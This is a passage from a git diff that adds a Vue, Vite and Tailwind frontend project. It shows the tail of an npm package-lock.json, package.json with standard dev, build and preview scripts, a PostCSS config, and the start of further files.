"arm" + ], + "license": "MPL-2.0", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">= 12.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/parcel" + } + }, + "node_modules/lightningcss-linux-arm64-gnu": { + "version": "1.30.2", + "resolved": "https://registry.npmjs.org/lightningcss-linux-arm64-gnu/-/lightningcss-linux-arm64-gnu-1.30.2.tgz", + "integrity": "sha512-UK65WJAbwIJbiBFXpxrbTNArtfuznvxAJw4Q2ZGlU8kPeDIWEX1dg3rn2veBVUylA2Ezg89ktszWbaQnxD/e3A==", + "cpu": [ + "arm64" + ], + "license": "MPL-2.0", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">= 12.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/parcel" + } + }, + "node_modules/lightningcss-linux-arm64-musl": { + "version": "1.30.2", + "resolved": "https://registry.npmjs.org/lightningcss-linux-arm64-musl/-/lightningcss-linux-arm64-musl-1.30.2.tgz", + "integrity": "sha512-5Vh9dGeblpTxWHpOx8iauV02popZDsCYMPIgiuw97OJ5uaDsL86cnqSFs5LZkG3ghHoX5isLgWzMs+eD1YzrnA==", + "cpu": [ + "arm64" + ], + "license": "MPL-2.0", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">= 12.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/parcel" + } + }, + "node_modules/lightningcss-linux-x64-gnu": { + "version": "1.30.2", + "resolved": "https://registry.npmjs.org/lightningcss-linux-x64-gnu/-/lightningcss-linux-x64-gnu-1.30.2.tgz", + "integrity": "sha512-Cfd46gdmj1vQ+lR6VRTTadNHu6ALuw2pKR9lYq4FnhvgBc4zWY1EtZcAc6EffShbb1MFrIPfLDXD6Xprbnni4w==", + "cpu": [ + "x64" + ], + "license": "MPL-2.0", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">= 12.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/parcel" + } + }, + "node_modules/lightningcss-linux-x64-musl": { + "version": "1.30.2", + "resolved": "https://registry.npmjs.org/lightningcss-linux-x64-musl/-/lightningcss-linux-x64-musl-1.30.2.tgz", + "integrity": "sha512-XJaLUUFXb6/QG2lGIW6aIk6jKdtjtcffUT0NKvIqhSBY3hh9Ch+1LCeH80dR9q9LBjG3ewbDjnumefsLsP6aiA==", + "cpu": [ + "x64" + ], + "license": "MPL-2.0", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">= 12.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/parcel" + } + }, + "node_modules/lightningcss-win32-arm64-msvc": { + "version": "1.30.2", + "resolved": "https://registry.npmjs.org/lightningcss-win32-arm64-msvc/-/lightningcss-win32-arm64-msvc-1.30.2.tgz", + "integrity": "sha512-FZn+vaj7zLv//D/192WFFVA0RgHawIcHqLX9xuWiQt7P0PtdFEVaxgF9rjM/IRYHQXNnk61/H/gb2Ei+kUQ4xQ==", + "cpu": [ + "arm64" + ], + "license": "MPL-2.0", + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": ">= 12.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/parcel" + } + }, + "node_modules/lightningcss-win32-x64-msvc": { + "version": "1.30.2", + "resolved": "https://registry.npmjs.org/lightningcss-win32-x64-msvc/-/lightningcss-win32-x64-msvc-1.30.2.tgz", + "integrity": "sha512-5g1yc73p+iAkid5phb4oVFMB45417DkRevRbt/El/gKXJk4jid+vPFF/AXbxn05Aky8PapwzZrdJShv5C0avjw==", + "cpu": [ + "x64" + ], + "license": "MPL-2.0", + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": ">= 12.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/parcel" + } + }, + "node_modules/local-pkg": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/local-pkg/-/local-pkg-1.1.2.tgz", + "integrity": "sha512-arhlxbFRmoQHl33a0Zkle/YWlmNwoyt6QNZEIJcqNbdrsix5Lvc4HyyI3EnwxTYlZYc32EbYrQ8SzEZ7dqgg9A==", + "license": "MIT", + "dependencies": { + "mlly": "^1.7.4", + "pkg-types": "^2.3.0", + "quansync": "^0.2.11" + }, + "engines": { + "node": ">=14" + }, + "funding": { + "url": "https://github.com/sponsors/antfu" + } + }, + "node_modules/magic-string": { + "version": "0.30.21", + "resolved": "https://registry.npmjs.org/magic-string/-/magic-string-0.30.21.tgz", + "integrity": "sha512-vd2F4YUyEXKGcLHoq+TEyCjxueSeHnFxyyjNp80yg0XV4vUhnDer/lvvlqM/arB5bXQN5K2/3oinyCRyx8T2CQ==", + "license": "MIT", + "dependencies": { + "@jridgewell/sourcemap-codec": "^1.5.5" + } + }, + "node_modules/magic-string-ast": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/magic-string-ast/-/magic-string-ast-1.0.3.tgz", + "integrity": "sha512-CvkkH1i81zl7mmb94DsRiFeG9V2fR2JeuK8yDgS8oiZSFa++wWLEgZ5ufEOyLHbvSbD1gTRKv9NdX69Rnvr9JA==", + "license": "MIT", + "dependencies": { + "magic-string": "^0.30.19" + }, + "engines": { + "node": ">=20.19.0" + }, + "funding": { + "url": "https://github.com/sponsors/sxzz" + } + }, + "node_modules/math-intrinsics": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/math-intrinsics/-/math-intrinsics-1.1.0.tgz", + "integrity": "sha512-/IXtbwEk5HTPyEwyKX6hGkYXxM9nbj64B+ilVJnC/R6B0pH5G4V3b0pVbL7DBj4tkhBAppbQUlf6F6Xl9LHu1g==", + "license": "MIT", + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/mime-db": { + "version": "1.52.0", + "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", + "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==", + "license": "MIT", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/mime-types": { + "version": "2.1.35", + "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", + "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", + "license": "MIT", + "dependencies": { + "mime-db": "1.52.0" + }, + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/mitt": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/mitt/-/mitt-3.0.1.tgz", + "integrity": "sha512-vKivATfr97l2/QBCYAkXYDbrIWPM2IIKEl7YPhjCvKlG3kE2gm+uBo6nEXK3M5/Ffh/FLpKExzOQ3JJoJGFKBw==", + "license": "MIT" + }, + "node_modules/mlly": { + "version": "1.8.0", + "resolved": "https://registry.npmjs.org/mlly/-/mlly-1.8.0.tgz", + "integrity": "sha512-l8D9ODSRWLe2KHJSifWGwBqpTZXIXTeo8mlKjY+E2HAakaTeNpqAyBZ8GSqLzHgw4XmHmC8whvpjJNMbFZN7/g==", + "license": "MIT", + "dependencies": { + "acorn": "^8.15.0", + "pathe": "^2.0.3", + "pkg-types": "^1.3.1", + "ufo": "^1.6.1" + } + }, + "node_modules/mlly/node_modules/confbox": { + "version": "0.1.8", + "resolved": "https://registry.npmjs.org/confbox/-/confbox-0.1.8.tgz", + "integrity": "sha512-RMtmw0iFkeR4YV+fUOSucriAQNb9g8zFR52MWCtl+cCZOFRNL6zeB395vPzFhEjjn4fMxXudmELnl/KF/WrK6w==", + "license": "MIT" + }, + "node_modules/mlly/node_modules/pkg-types": { + "version": "1.3.1", + "resolved": "https://registry.npmjs.org/pkg-types/-/pkg-types-1.3.1.tgz", + "integrity": "sha512-/Jm5M4RvtBFVkKWRu2BLUTNP8/M2a+UwuAX+ae4770q1qVGtfjG+WTCupoZixokjmHiry8uI+dlY8KXYV5HVVQ==", + "license": "MIT", + "dependencies": { + "confbox": "^0.1.8", + "mlly": "^1.7.4", + "pathe": "^2.0.1" + } + }, + "node_modules/muggle-string": { + "version": "0.4.1", + "resolved": "https://registry.npmjs.org/muggle-string/-/muggle-string-0.4.1.tgz", + "integrity": "sha512-VNTrAak/KhO2i8dqqnqnAHOa3cYBwXEZe9h+D5h/1ZqFSTEFHdM65lR7RoIqq3tBBYavsOXV84NoHXZ0AkPyqQ==", + "license": "MIT" + }, + "node_modules/nanoid": { + "version": "3.3.11", + "resolved": "https://registry.npmjs.org/nanoid/-/nanoid-3.3.11.tgz", + "integrity": "sha512-N8SpfPUnUp1bK+PMYW8qSWdl9U+wwNWI4QKxOYDy9JAro3WMX7p2OeVRF9v+347pnakNevPmiHhNmZ2HbFA76w==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/ai" + } + ], + "license": "MIT", + "bin": { + "nanoid": "bin/nanoid.cjs" + }, + "engines": { + "node": "^10 || ^12 || ^13.7 || ^14 || >=15.0.1" + } + }, + "node_modules/node-releases": { + "version": "2.0.27", + "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.27.tgz", + "integrity": "sha512-nmh3lCkYZ3grZvqcCH+fjmQ7X+H0OeZgP40OierEaAptX4XofMh5kwNbWh7lBduUzCcV/8kZ+NDLCwm2iorIlA==", + "dev": true, + "license": "MIT" + }, + "node_modules/pathe": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/pathe/-/pathe-2.0.3.tgz", + "integrity": "sha512-WUjGcAqP1gQacoQe+OBJsFA7Ld4DyXuUIjZ5cc75cLHvJ7dtNsTugphxIADwspS+AraAUePCKrSVtPLFj/F88w==", + "license": "MIT" + }, + "node_modules/perfect-debounce": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/perfect-debounce/-/perfect-debounce-1.0.0.tgz", + "integrity": "sha512-xCy9V055GLEqoFaHoC1SoLIaLmWctgCUaBaWxDZ7/Zx4CTyX7cJQLJOok/orfjZAh9kEYpjJa4d0KcJmCbctZA==", + "license": "MIT" + }, + "node_modules/picocolors": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.1.1.tgz", + "integrity": "sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==", + "license": "ISC" + }, + "node_modules/picomatch": { + "version": "4.0.3", + "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-4.0.3.tgz", + "integrity": "sha512-5gTmgEY/sqK6gFXLIsQNH19lWb4ebPDLA4SdLP7dsWkIXHWlG66oPuVvXSGFPppYZz8ZDZq0dYYrbHfBCVUb1Q==", + "license": "MIT", + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/sponsors/jonschlinkert" + } + }, + "node_modules/pinia": { + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/pinia/-/pinia-3.0.4.tgz", + "integrity": "sha512-l7pqLUFTI/+ESXn6k3nu30ZIzW5E2WZF/LaHJEpoq6ElcLD+wduZoB2kBN19du6K/4FDpPMazY2wJr+IndBtQw==", + "license": "MIT", + "dependencies": { + "@vue/devtools-api": "^7.7.7" + }, + "funding": { + "url": "https://github.com/sponsors/posva" + }, + "peerDependencies": { + "typescript": ">=4.5.0", + "vue": "^3.5.11" + }, + "peerDependenciesMeta": { + "typescript": { + "optional": true + } + } + }, + "node_modules/pkg-types": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/pkg-types/-/pkg-types-2.3.0.tgz", + "integrity": "sha512-SIqCzDRg0s9npO5XQ3tNZioRY1uK06lA41ynBC1YmFTmnY6FjUjVt6s4LoADmwoig1qqD0oK8h1p/8mlMx8Oig==", + "license": "MIT", + "dependencies": { + "confbox": "^0.2.2", + "exsolve": "^1.0.7", + "pathe": "^2.0.3" + } + }, + "node_modules/postcss": { + "version": "8.5.6", + "resolved": "https://registry.npmjs.org/postcss/-/postcss-8.5.6.tgz", + "integrity": "sha512-3Ybi1tAuwAP9s0r1UQ2J4n5Y0G05bJkpUIO0/bI9MhwmD70S5aTWbXGBwxHrelT+XM1k6dM0pk+SwNkpTRN7Pg==", + "funding": [ + { + "type": "opencollective", + "url": "https://opencollective.com/postcss/" + }, + { + "type": "tidelift", + "url": "https://tidelift.com/funding/github/npm/postcss" + }, + { + "type": "github", + "url": "https://github.com/sponsors/ai" + } + ], + "license": "MIT", + "dependencies": { + "nanoid": "^3.3.11", + "picocolors": "^1.1.1", + "source-map-js": "^1.2.1" + }, + "engines": { + "node": "^10 || ^12 || >=14" + } + }, + "node_modules/postcss-value-parser": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/postcss-value-parser/-/postcss-value-parser-4.2.0.tgz", + "integrity": "sha512-1NNCs6uurfkVbeXG4S8JFT9t19m45ICnif8zWLd5oPSZ50QnwMfK+H3jv408d4jw/7Bttv5axS5IiHoLaVNHeQ==", + "dev": true, + "license": "MIT" + }, + "node_modules/proxy-from-env": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/proxy-from-env/-/proxy-from-env-1.1.0.tgz", + "integrity": "sha512-D+zkORCbA9f1tdWRK0RaCR3GPv50cMxcrz4X8k5LTSUD1Dkw47mKJEZQNunItRTkWwgtaUSo1RVFRIG9ZXiFYg==", + "license": "MIT" + }, + "node_modules/quansync": { + "version": "0.2.11", + "resolved": "https://registry.npmjs.org/quansync/-/quansync-0.2.11.tgz", + "integrity": "sha512-AifT7QEbW9Nri4tAwR5M/uzpBuqfZf+zwaEM/QkzEjj7NBuFD2rBuy0K3dE+8wltbezDV7JMA0WfnCPYRSYbXA==", + "funding": [ + { + "type": "individual", + "url": "https://github.com/sponsors/antfu" + }, + { + "type": "individual", + "url": "https://github.com/sponsors/sxzz" + } + ], + "license": "MIT" + }, + "node_modules/readdirp": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/readdirp/-/readdirp-5.0.0.tgz", + "integrity": "sha512-9u/XQ1pvrQtYyMpZe7DXKv2p5CNvyVwzUB6uhLAnQwHMSgKMBR62lc7AHljaeteeHXn11XTAaLLUVZYVZyuRBQ==", + "license": "MIT", + "engines": { + "node": ">= 20.19.0" + }, + "funding": { + "type": "individual", + "url": "https://paulmillr.com/funding/" + } + }, + "node_modules/rfdc": { + "version": "1.4.1", + "resolved": "https://registry.npmjs.org/rfdc/-/rfdc-1.4.1.tgz", + "integrity": "sha512-q1b3N5QkRUWUl7iyylaaj3kOpIT0N2i9MqIEQXP73GVsN9cw3fdx8X63cEmWhJGi2PPCF23Ijp7ktmd39rawIA==", + "license": "MIT" + }, + "node_modules/rollup": { + "version": "4.57.0", + "resolved": "https://registry.npmjs.org/rollup/-/rollup-4.57.0.tgz", + "integrity": "sha512-e5lPJi/aui4TO1LpAXIRLySmwXSE8k3b9zoGfd42p67wzxog4WHjiZF3M2uheQih4DGyc25QEV4yRBbpueNiUA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/estree": "1.0.8" + }, + "bin": { + "rollup": "dist/bin/rollup" + }, + "engines": { + "node": ">=18.0.0", + "npm": ">=8.0.0" + }, + "optionalDependencies": { + "@rollup/rollup-android-arm-eabi": "4.57.0", + "@rollup/rollup-android-arm64": "4.57.0", + "@rollup/rollup-darwin-arm64": "4.57.0", + "@rollup/rollup-darwin-x64": "4.57.0", + "@rollup/rollup-freebsd-arm64": "4.57.0", + "@rollup/rollup-freebsd-x64": "4.57.0", + "@rollup/rollup-linux-arm-gnueabihf": "4.57.0", + "@rollup/rollup-linux-arm-musleabihf": "4.57.0", + "@rollup/rollup-linux-arm64-gnu": "4.57.0", + "@rollup/rollup-linux-arm64-musl": "4.57.0", + "@rollup/rollup-linux-loong64-gnu": "4.57.0", + "@rollup/rollup-linux-loong64-musl": "4.57.0", + "@rollup/rollup-linux-ppc64-gnu": "4.57.0", + "@rollup/rollup-linux-ppc64-musl": "4.57.0", + "@rollup/rollup-linux-riscv64-gnu": "4.57.0", + "@rollup/rollup-linux-riscv64-musl": "4.57.0", + "@rollup/rollup-linux-s390x-gnu": "4.57.0", + "@rollup/rollup-linux-x64-gnu": "4.57.0", + "@rollup/rollup-linux-x64-musl": "4.57.0", + "@rollup/rollup-openbsd-x64": "4.57.0", + "@rollup/rollup-openharmony-arm64": "4.57.0", + "@rollup/rollup-win32-arm64-msvc": "4.57.0", + "@rollup/rollup-win32-ia32-msvc": "4.57.0", + "@rollup/rollup-win32-x64-gnu": "4.57.0", + "@rollup/rollup-win32-x64-msvc": "4.57.0", + "fsevents": "~2.3.2" + } + }, + "node_modules/scule": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/scule/-/scule-1.3.0.tgz", + "integrity": "sha512-6FtHJEvt+pVMIB9IBY+IcCJ6Z5f1iQnytgyfKMhDKgmzYG+TeH/wx1y3l27rshSbLiSanrR9ffZDrEsmjlQF2g==", + "license": "MIT" + }, + "node_modules/source-map-js": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/source-map-js/-/source-map-js-1.2.1.tgz", + "integrity": "sha512-UXWMKhLOwVKb728IUtQPXxfYU+usdybtUrK/8uGE8CQMvrhOpwvzDBwj0QhSL7MQc7vIsISBG8VQ8+IDQxpfQA==", + "license": "BSD-3-Clause", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/speakingurl": { + "version": "14.0.1", + "resolved": "https://registry.npmjs.org/speakingurl/-/speakingurl-14.0.1.tgz", + "integrity": "sha512-1POYv7uv2gXoyGFpBCmpDVSNV74IfsWlDW216UPjbWufNf+bSU6GdbDsxdcxtfwb4xlI3yxzOTKClUosxARYrQ==", + "license": "BSD-3-Clause", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/superjson": { + "version": "2.2.6", + "resolved": "https://registry.npmjs.org/superjson/-/superjson-2.2.6.tgz", + "integrity": "sha512-H+ue8Zo4vJmV2nRjpx86P35lzwDT3nItnIsocgumgr0hHMQ+ZGq5vrERg9kJBo5AWGmxZDhzDo+WVIJqkB0cGA==", + "license": "MIT", + "dependencies": { + "copy-anything": "^4" + }, + "engines": { + "node": ">=16" + } + }, + "node_modules/tailwindcss": { + "version": "4.1.18", + "resolved": "https://registry.npmjs.org/tailwindcss/-/tailwindcss-4.1.18.tgz", + "integrity": "sha512-4+Z+0yiYyEtUVCScyfHCxOYP06L5Ne+JiHhY2IjR2KWMIWhJOYZKLSGZaP5HkZ8+bY0cxfzwDE5uOmzFXyIwxw==", + "license": "MIT" + }, + "node_modules/tapable": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/tapable/-/tapable-2.3.0.tgz", + "integrity": "sha512-g9ljZiwki/LfxmQADO3dEY1CbpmXT5Hm2fJ+QaGKwSXUylMybePR7/67YW7jOrrvjEgL1Fmz5kzyAjWVWLlucg==", + "license": "MIT", + "engines": { + "node": ">=6" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + } + }, + "node_modules/tinyglobby": { + "version": "0.2.15", + "resolved": "https://registry.npmjs.org/tinyglobby/-/tinyglobby-0.2.15.tgz", + "integrity": "sha512-j2Zq4NyQYG5XMST4cbs02Ak8iJUdxRM0XI5QyxXuZOzKOINmWurp3smXu3y5wDcJrptwpSjgXHzIQxR0omXljQ==", + "license": "MIT", + "dependencies": { + "fdir": "^6.5.0", + "picomatch": "^4.0.3" + }, + "engines": { + "node": ">=12.0.0" + }, + "funding": { + "url": "https://github.com/sponsors/SuperchupuDev" + } + }, + "node_modules/ufo": { + "version": "1.6.3", + "resolved": "https://registry.npmjs.org/ufo/-/ufo-1.6.3.tgz", + "integrity": "sha512-yDJTmhydvl5lJzBmy/hyOAA0d+aqCBuwl818haVdYCRrWV84o7YyeVm4QlVHStqNrrJSTb6jKuFAVqAFsr+K3Q==", + "license": "MIT" + }, + "node_modules/unplugin": { + "version": "2.3.11", + "resolved": "https://registry.npmjs.org/unplugin/-/unplugin-2.3.11.tgz", + "integrity": "sha512-5uKD0nqiYVzlmCRs01Fhs2BdkEgBS3SAVP6ndrBsuK42iC2+JHyxM05Rm9G8+5mkmRtzMZGY8Ct5+mliZxU/Ww==", + "license": "MIT", + "dependencies": { + "@jridgewell/remapping": "^2.3.5", + "acorn": "^8.15.0", + "picomatch": "^4.0.3", + "webpack-virtual-modules": "^0.6.2" + }, + "engines": { + "node": ">=18.12.0" + } + }, + "node_modules/unplugin-utils": { + "version": "0.3.1", + "resolved": "https://registry.npmjs.org/unplugin-utils/-/unplugin-utils-0.3.1.tgz", + "integrity": "sha512-5lWVjgi6vuHhJ526bI4nlCOmkCIF3nnfXkCMDeMJrtdvxTs6ZFCM8oNufGTsDbKv/tJ/xj8RpvXjRuPBZJuJog==", + "license": "MIT", + "dependencies": { + "pathe": "^2.0.3", + "picomatch": "^4.0.3" + }, + "engines": { + "node": ">=20.19.0" + }, + "funding": { + "url": "https://github.com/sponsors/sxzz" + } + }, + "node_modules/update-browserslist-db": { + "version": "1.2.3", + "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.2.3.tgz", + "integrity": "sha512-Js0m9cx+qOgDxo0eMiFGEueWztz+d4+M3rGlmKPT+T4IS/jP4ylw3Nwpu6cpTTP8R1MAC1kF4VbdLt3ARf209w==", + "dev": true, + "funding": [ + { + "type": "opencollective", + "url": "https://opencollective.com/browserslist" + }, + { + "type": "tidelift", + "url": "https://tidelift.com/funding/github/npm/browserslist" + }, + { + "type": "github", + "url": "https://github.com/sponsors/ai" + } + ], + "license": "MIT", + "dependencies": { + "escalade": "^3.2.0", + "picocolors": "^1.1.1" + }, + "bin": { + "update-browserslist-db": "cli.js" + }, + "peerDependencies": { + "browserslist": ">= 4.21.0" + } + }, + "node_modules/vite": { + "version": "7.3.1", + "resolved": "https://registry.npmjs.org/vite/-/vite-7.3.1.tgz", + "integrity": "sha512-w+N7Hifpc3gRjZ63vYBXA56dvvRlNWRczTdmCBBa+CotUzAPf5b7YMdMR/8CQoeYE5LX3W4wj6RYTgonm1b9DA==", + "dev": true, + "license": "MIT", + "dependencies": { + "esbuild": "^0.27.0", + "fdir": "^6.5.0", + "picomatch": "^4.0.3", + "postcss": "^8.5.6", + "rollup": "^4.43.0", + "tinyglobby": "^0.2.15" + }, + "bin": { + "vite": "bin/vite.js" + }, + "engines": { + "node": "^20.19.0 || >=22.12.0" + }, + "funding": { + "url": "https://github.com/vitejs/vite?sponsor=1" + }, + "optionalDependencies": { + "fsevents": "~2.3.3" + }, + "peerDependencies": { + "@types/node": "^20.19.0 || >=22.12.0", + "jiti": ">=1.21.0", + "less": "^4.0.0", + "lightningcss": "^1.21.0", + "sass": "^1.70.0", + "sass-embedded": "^1.70.0", + "stylus": ">=0.54.8", + "sugarss": "^5.0.0", + "terser": "^5.16.0", + "tsx": "^4.8.1", + "yaml": "^2.4.2" + }, + "peerDependenciesMeta": { + "@types/node": { + "optional": true + }, + "jiti": { + "optional": true + }, + "less": { + "optional": true + }, + "lightningcss": { + "optional": true + }, + "sass": { + "optional": true + }, + "sass-embedded": { + "optional": true + }, + "stylus": { + "optional": true + }, + "sugarss": { + "optional": true + }, + "terser": { + "optional": true + }, + "tsx": { + "optional": true + }, + "yaml": { + "optional": true + } + } + }, + "node_modules/vue": { + "version": "3.5.27", + "resolved": "https://registry.npmjs.org/vue/-/vue-3.5.27.tgz", + "integrity": "sha512-aJ/UtoEyFySPBGarREmN4z6qNKpbEguYHMmXSiOGk69czc+zhs0NF6tEFrY8TZKAl8N/LYAkd4JHVd5E/AsSmw==", + "license": "MIT", + "dependencies": { + "@vue/compiler-dom": "3.5.27", + "@vue/compiler-sfc": "3.5.27", + "@vue/runtime-dom": "3.5.27", + "@vue/server-renderer": "3.5.27", + "@vue/shared": "3.5.27" + }, + "peerDependencies": { + "typescript": "*" + }, + "peerDependenciesMeta": { + "typescript": { + "optional": true + } + } + }, + "node_modules/vue-chartjs": { + "version": "5.3.3", + "resolved": "https://registry.npmjs.org/vue-chartjs/-/vue-chartjs-5.3.3.tgz", + "integrity": "sha512-jqxtL8KZ6YJ5NTv6XzrzLS7osyegOi28UGNZW0h9OkDL7Sh1396ht4Dorh04aKrl2LiSalQ84WtqiG0RIJb0tA==", + "license": "MIT", + "peerDependencies": { + "chart.js": "^4.1.1", + "vue": "^3.0.0-0 || ^2.7.0" + } + }, + "node_modules/vue-router": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/vue-router/-/vue-router-5.0.0.tgz", + "integrity": "sha512-xWHlps4o1ScODWqvyapl0v1uGy0g7ozmsTSO/dguyGb/9RL6oSU2HfN/8oMXnoFOH1BuTaAkbiOz4OWdkfjcZg==", + "license": "MIT", + "dependencies": { + "@babel/generator": "^7.28.6", + "@vue-macros/common": "^3.1.1", + "@vue/devtools-api": "^8.0.0", + "ast-walker-scope": "^0.8.3", + "chokidar": "^5.0.0", + "json5": "^2.2.3", + "local-pkg": "^1.1.2", + "magic-string": "^0.30.21", + "mlly": "^1.8.0", + "muggle-string": "^0.4.1", + "pathe": "^2.0.3", + "picomatch": "^4.0.3", + "scule": "^1.3.0", + "tinyglobby": "^0.2.15", + "unplugin": "^2.3.11", + "unplugin-utils": "^0.3.1", + "yaml": "^2.8.2" + }, + "funding": { + "url": "https://github.com/sponsors/posva" + }, + "peerDependencies": { + "@pinia/colada": "^0.18.1", + "@vue/compiler-sfc": "^3.5.17", + "pinia": "^3.0.4", + "vue": "^3.5.0" + }, + "peerDependenciesMeta": { + "@pinia/colada": { + "optional": true + }, + "@vue/compiler-sfc": { + "optional": true + }, + "pinia": { + "optional": true + } + } + }, + "node_modules/vue-router/node_modules/@vue/devtools-api": { + "version": "8.0.5", + "resolved": "https://registry.npmjs.org/@vue/devtools-api/-/devtools-api-8.0.5.tgz", + "integrity": "sha512-DgVcW8H/Nral7LgZEecYFFYXnAvGuN9C3L3DtWekAncFBedBczpNW8iHKExfaM559Zm8wQWrwtYZ9lXthEHtDw==", + "license": "MIT", + "dependencies": { + "@vue/devtools-kit": "^8.0.5" + } + }, + "node_modules/vue-router/node_modules/@vue/devtools-kit": { + "version": "8.0.5", + "resolved": "https://registry.npmjs.org/@vue/devtools-kit/-/devtools-kit-8.0.5.tgz", + "integrity": "sha512-q2VV6x1U3KJMTQPUlRMyWEKVbcHuxhqJdSr6Jtjz5uAThAIrfJ6WVZdGZm5cuO63ZnSUz0RCsVwiUUb0mDV0Yg==", + "license": "MIT", + "dependencies": { + "@vue/devtools-shared": "^8.0.5", + "birpc": "^2.6.1", + "hookable": "^5.5.3", + "mitt": "^3.0.1", + "perfect-debounce": "^2.0.0", + "speakingurl": "^14.0.1", + "superjson": "^2.2.2" + } + }, + "node_modules/vue-router/node_modules/@vue/devtools-shared": { + "version": "8.0.5", + "resolved": "https://registry.npmjs.org/@vue/devtools-shared/-/devtools-shared-8.0.5.tgz", + "integrity": "sha512-bRLn6/spxpmgLk+iwOrR29KrYnJjG9DGpHGkDFG82UM21ZpJ39ztUT9OXX3g+usW7/b2z+h46I9ZiYyB07XMXg==", + "license": "MIT", + "dependencies": { + "rfdc": "^1.4.1" + } + }, + "node_modules/vue-router/node_modules/perfect-debounce": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/perfect-debounce/-/perfect-debounce-2.1.0.tgz", + "integrity": "sha512-LjgdTytVFXeUgtHZr9WYViYSM/g8MkcTPYDlPa3cDqMirHjKiSZPYd6DoL7pK8AJQr+uWkQvCjHNdiMqsrJs+g==", + "license": "MIT" + }, + "node_modules/webpack-virtual-modules": { + "version": "0.6.2", + "resolved": "https://registry.npmjs.org/webpack-virtual-modules/-/webpack-virtual-modules-0.6.2.tgz", + "integrity": "sha512-66/V2i5hQanC51vBQKPH4aI8NMAcBW59FVBs+rC7eGHupMyfn34q7rZIE+ETlJ+XTevqfUhVVBgSUNSW2flEUQ==", + "license": "MIT" + }, + "node_modules/yaml": { + "version": "2.8.2", + "resolved": "https://registry.npmjs.org/yaml/-/yaml-2.8.2.tgz", + "integrity": "sha512-mplynKqc1C2hTVYxd0PU2xQAc22TI1vShAYGksCCfxbn/dFwnHTNi1bvYsBTkhdUNtGIf5xNOg938rrSSYvS9A==", + "license": "ISC", + "bin": { + "yaml": "bin.mjs" + }, + "engines": { + "node": ">= 14.6" + }, + "funding": { + "url": "https://github.com/sponsors/eemeli" + } + } + } +} diff --git a/frontend/package.json b/frontend/package.json new file mode 100755 index 0000000..c77b525 --- /dev/null +++ b/frontend/package.json @@ -0,0 +1,27 @@ +{ + "name": "frontend", + "private": true, + "version": "0.0.0", + "type": "module", + "scripts": { + "dev": "vite", + "build": "vite build", + "preview": "vite preview" + }, + "dependencies": { + "@tailwindcss/postcss": "^4.1.18", + "axios": "^1.13.4", + "chart.js": "^4.5.1", + "pinia": "^3.0.4", + "vue": "^3.5.24", + "vue-chartjs": "^5.3.3", + "vue-router": "^5.0.0" + }, + "devDependencies": { + "@vitejs/plugin-vue": "^6.0.1", + "autoprefixer": "^10.4.23", + "postcss": "^8.5.6", + "tailwindcss": "^4.1.18", + "vite": "^7.2.4" + } +} diff --git a/frontend/postcss.config.js b/frontend/postcss.config.js new file mode 100755 index 0000000..af9d8dc --- /dev/null +++ b/frontend/postcss.config.js @@ -0,0 +1,6 @@ +export default { + plugins: { + '@tailwindcss/postcss': {}, + autoprefixer: {}, + }, +} \ No newline at end of file diff --git a/frontend/public/vite.svg b/frontend/public/vite.svg new file mode 100755 index 0000000..e7b8dfb --- /dev/null +++ b/frontend/public/vite.svg @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/frontend/src/App.vue b/frontend/src/App.vue new file mode 100755 index 0000000..3e049f0 --- /dev/null +++ 